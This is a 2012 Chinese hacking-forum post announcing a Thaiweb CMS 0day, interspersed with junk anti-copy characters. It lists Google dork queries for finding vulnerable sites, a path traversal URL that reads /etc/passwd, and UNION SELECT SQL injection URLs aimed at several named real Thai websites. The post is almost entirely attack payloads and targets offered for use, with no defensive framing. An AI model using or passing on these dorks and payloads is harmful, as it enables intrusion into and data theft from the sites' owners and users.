找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2183|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
' x3 t) i7 u7 N& q! j( S: F* b* ]* [: S8 q' M3 m% T
intext:powered by Thaiweb
! c% ?' V9 @4 e/ U  A6 ^, E) b  k. P, M* d1 ^  m
inurl:index.php?page=board.php5 u3 p  V( m2 {

) C+ [/ x* ?  C! _4 S7 w0 r 9 K1 n' Z4 Q5 r) U1 t9 E, W2 a: k
* I" _& f- k9 c* N
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
* G! I  s% O5 x" R% z8 a
( Z% s; s7 C" j8 F' |7 j' G2 T, H
& [9 B- [3 s2 A5 }: w! ]
. z2 _) c" e4 s5 _2 T利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
8 i* h8 Q7 ?! T5 \% M8 p) X
9 [8 x  |$ K" B 7 H$ Z! u& o( H* e: k
2 p" q8 u/ d* G- Z
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
* M5 u1 d1 q2 I
+ ?3 M! l" ~5 W. H% Zhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--: o! h+ e( M0 t* `0 T' O
6 o' I, j* O# M1 F* ~- g' ?. r9 n
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ p- G; V* }) t5 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表